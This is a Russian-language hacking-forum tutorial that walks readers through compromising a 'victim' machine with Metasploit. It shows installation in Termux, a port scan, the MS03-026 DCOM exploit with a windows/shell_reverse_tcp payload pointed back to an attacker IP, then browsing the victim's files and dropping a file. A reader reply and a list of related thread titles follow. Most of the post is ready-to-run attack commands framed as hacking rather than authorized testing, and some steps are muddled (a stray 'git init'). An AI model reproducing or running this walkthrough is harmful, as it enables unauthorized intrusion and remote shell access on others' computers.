Как просканировать любое устройство на уязвимости?

H

Hackers Academy

Салом КулХацкер!

И так сегодня у нас пойдет речь о Кибербезопасности.Ведь чтобы просканировать устройство на уязвимости.Для этого не обязательно знать все эксплоиты.

Сегодня мы будем использовать Metasploit.Ни все знают одну фишку метасплоита.И попытаемся не только просканировать устройство.Но и взломать его.У нас же как сказать канал про Хакеров.Совместим полезное с приятным.

Ну что ж приступим.

Можно такие действия повторять что и в linux что и в termux

Разницы нет

В kali , parrot , black arch он уже встроен.Чтобы его запустить просто пропишем команду :

msfconsole

В Termux нужно устанавливать

Для начала установим metasploit

apt update

apt install unstable-repo

apt install metasploit

Команда запуска:

msfconsole

Все мы запустили Metasploit

Теперь мы пишем команду

db_status

для проверки состояния базы данных метасплоита.

Если у вас Connected

Как на скриншоте

e449c4db1c79b8c5be6f9.png

Значит все в порядке.

Пропишем команду для старта пользования

git init



use auxiliary/scanner/portscan/tcp -Команда для сканирования открытых портов.

set PORTS 1-5000 - количество открытых портов .От 1 до 5000

set RHOSTS 192.168.88.161 - Вводим IP жертвы

run - команда запуска

search dcom - работа с эксплоитами dcom

4c3e74c2cf0ac551ed85d.png

У нас появляется вот такая панель.С эксплоитами.Выбираем тот эксплоит на котором написано No и ранг эксплоита great.Который подходит для взлома.Можно конечно выбрать любой.Но врятли он будет подходить для взлома.В данном случае я буду использовать эксплоит exploit/windows/dcerpc/ms03_026_dcom

Для этого пропишем команду

use exploit/windows/dcerpc/ms03_026_dcom

set payload windows/shell_reverse_tcp - команда для создания полезной нагрузки самая часто используемая для взлома.

show options - Команда для проверки того что нам нужно заполнить перед началом запуска эксплоита

7c9bee64c3d6a9f5bd475.png

Как мы видем у нас здесь не заполнено поле IP жертвы и IP злоумышленника

set RHOSTS 192.168.88.161 (IP той машины, которую будем проверять на защищенность)

set LHOST 192.168.88.247 - IP злоумышленника

run - команда запуска эксплоита.Если не работает пишем команду exploit



cd ..\..\ - команда для перехода в директорию файлов

Я прописал команду dir

Чтобы получить доступ ко всем файлам жертвы

cd5d54bfabbcbbc1b7b0e.png

Прописывая следующую команду мы можем создать текстовый файл.И послать жертве письмо

71f575842bc2e6cca046b.png



echo Hello! (кнопка стрелки на Ю) achtung.x



Ну вот и все ребят.Мы выполнили взлом жертвы Компьютера.За одно и просканировали на уязвимости.Как говорится полезное с приятным.

Ну а с вами был ФCБ! Подписывайтесь на мой профиль UfoLabs и на мой телеграм канал Hackers Academy - http://t.me/academyofhackers
 
Z

zhurav

Здравствуйте! А можно по подробнее для чего надо было сканировать открытые порты если вы не взяли их в расчет ? и хотелось бы узнать на какую систему вы проводили атаку, что за ОС? были ли на ней файрвол и антивирь!?
 
Похожие темы
Admin Интересно Вашему RDP поставили «лайк». История о том, как горстка серверов прочесала Интернет и нашла все изъяны. Новости в сети 0
Admin Интересно Русские хакеры против картошки фри. Как взлом кассы самообслуживания обернулся годом условно. Новости в сети 0
Admin Интересно Тройная порция шантажа под соусом анонимности. Как одна банда притворяется сразу тремя разными группировками. Новости в сети 0
Admin Интересно Как соседей России заставляют выбирать между Европой и личным спокойствием. Новости в сети 0
Admin Интересно Позвони мне через пылесос. Как выживает рунет после блокировки мессенджеров. Новости в сети 0
Admin Интересно Ускоритель частиц размером с карандаш. Мощность — как у километрового. И это работает. Новости в сети 0
Admin Интересно Война правок и логотипов: Как Euro-Office поссорился с ONLYOFFICE из-за лицензии. Новости в сети 0
Admin Интересно Цифры врали. Не специально — просто их сложили неправильно. Вот как парадокс Симпсона ломает статистику. Новости в сети 0
Admin Интересно Цифровые активы после смерти: как управлять рисками для цифрового наследства. Новости в сети 0
Admin Интересно Тихий взлом и полная невидимость. Рассказываем, как новый вирус RoadK1ll захватывает корпоративные сети. Новости в сети 0
Admin Интересно Как заморозить воду быстрее? Сначала вскипятите её и плюньте на здравый смысл. Новости в сети 0
Admin Интересно Откройте доступ к коду из любой точки мира. Как работает новый проект rustunnel. Новости в сети 0
Admin Интересно Не просто «стенка с мониторами». Как за 6 недель создать работающий центр кибербезопасности. Новости в сети 0
Admin Интересно Хакеров много, а работать некому. Как кадровый голод обнуляет защиту мировых гигантов. Новости в сети 0
Admin Интересно Римские цифры, узелки инков и буква x в магазине: как запись чисел определила всю историю математики. Новости в сети 0
Admin Интересно 43% сотрудников опасаются, что ИИ лишит их работы. Как страх увольнения убивает эффективность бизнеса. Новости в сети 0
Admin Интересно Власти Венгрии решили завербовать сторонника оппозиции. Вышло как при коммунизме. Новости в сети 0
Admin Интересно Веб-семинар: Как проверить эффективность вашей защиты от реальных атак. Новости в сети 0
Admin Интересно Как заставить нейросеть удалить всё лишнее (и нужное тоже)? Разбираемся в «токсичных потоках». Новости в сети 0
Admin Интересно 27 граммов еды из 1 грамма бактерий. Как превратить марсианскую пыль в полноценный обед. Новости в сети 0
Admin Интересно Сложность облачных сред как главный враг кибербезопасности. Новости в сети 0
Admin Интересно Три миллиона IP-камер и роутеров по всему миру. Как спецслужбы разгромили гигантскую сеть ботнетов. Новости в сети 0
Admin Интересно Как короткий код превращает рабочую станцию в зомби. Новости в сети 0
Admin Интересно 20 часов до первого удара. Как ИИ-инструменты лишили системных администраторов сна. Новости в сети 0
Admin Интересно Форум SocioTech 2026: как объединить бизнес, информационную безопасность и персонал. Новости в сети 0
Admin Интересно GhostMail: как письмо о стажировке украло всю почту за 90 дней. Новости в сети 0
Admin Интересно Рынок шпионских программ: как посредники делают слежку анонимной и дорогой. Новости в сети 0
Admin Интересно Как быстро восстановить взломанный аккаунт: краткое руководство. Новости в сети 0
Admin Интересно Драйверы-предатели. Как легитимные программы помогают преступникам шифровать ваши данные. Новости в сети 0
Admin Интересно Практический онлайн-курс: как внедрить и настроить UserGate. Новости в сети 0
Admin Интересно Центральная предельная теорема: как случайности формируют закономерности. Новости в сети 0
Admin Интересно Как Mesh CSMA выявляет и устраняет пути атак на ключевые активы. Новости в сети 0
Admin Интересно Капча с двойным дном. Как обычное подтверждение, что вы не робот, превращается в установку шпиона. Новости в сети 0
Admin Интересно Кавычки решают всё. Как одна забытая проверка в коде подставила четверть миллиона владельцев сайтов. Новости в сети 0
Admin Интересно Спутники за миллиарды долларов боятся батарейки из супермаркета. Как военные и хулиганы «выключают» космос одной кнопкой. Новости в сети 0
Admin Интересно Anthropic запустила сервис для проверки кода, который работает как опытный разработчик. Новости в сети 0
Admin Интересно Как предотвратить утечку данных через ИИ: вебинар по аудиту современных агентских процессов. Новости в сети 0
Admin Интересно Фишинговая кампания перед выборами в Армении: как злоумышленники обошли защиту. Новости в сети 0
Admin Интересно Живые нейроны играют в «Doom»: как ученые заставили кусок плоти из пробирки расстреливать кибердемонов. Новости в сети 0
Admin Интересно Слишком сложно для Microsoft. Как три разработчика сделали сайт npm лучше, чем целая корпорация. Новости в сети 0
Admin Интересно Киберпреступники используют ICE как прикрытие для фишинговой кампании. Новости в сети 0
Admin Интересно Цифровой детокс по принуждению. Как юг Москвы неожиданно вернулся в эпоху до интернета. Новости в сети 0
Admin Интересно Как малый и средний бизнес использует исследования угроз и MDR для защиты. Новости в сети 0
Admin Интересно Claude AI демонстрирует, как технологии опережают правила и этику. Новости в сети 0
Admin Интересно Пчелиные соты, 24 измерения и нейросеть. Как ИИ проверил главную математическую работу десятилетия. Новости в сети 0
Admin Интересно Защита образования: как MDR может помочь школам в борьбе с киберугрозами. Новости в сети 0
Admin Интересно Укол вместо скальпеля. Ученые из MIT придумали, как вырастить «запасную» печень без операции. Новости в сети 0
Admin Интересно Робот стоит — лицо как живое. Улыбается — жуть. Пришлось собрать 200 тысяч 3D-лиц, чтобы научить машины мимике. Новости в сети 0
Admin Интересно Защита образования: как MDR помогает школам в борьбе с киберугрозами. Новости в сети 0
Admin Интересно Остров Рунет за триллион. Как Россия планирует окончательно отгородиться от мировой сети к 2028 году. Новости в сети 0

Название темы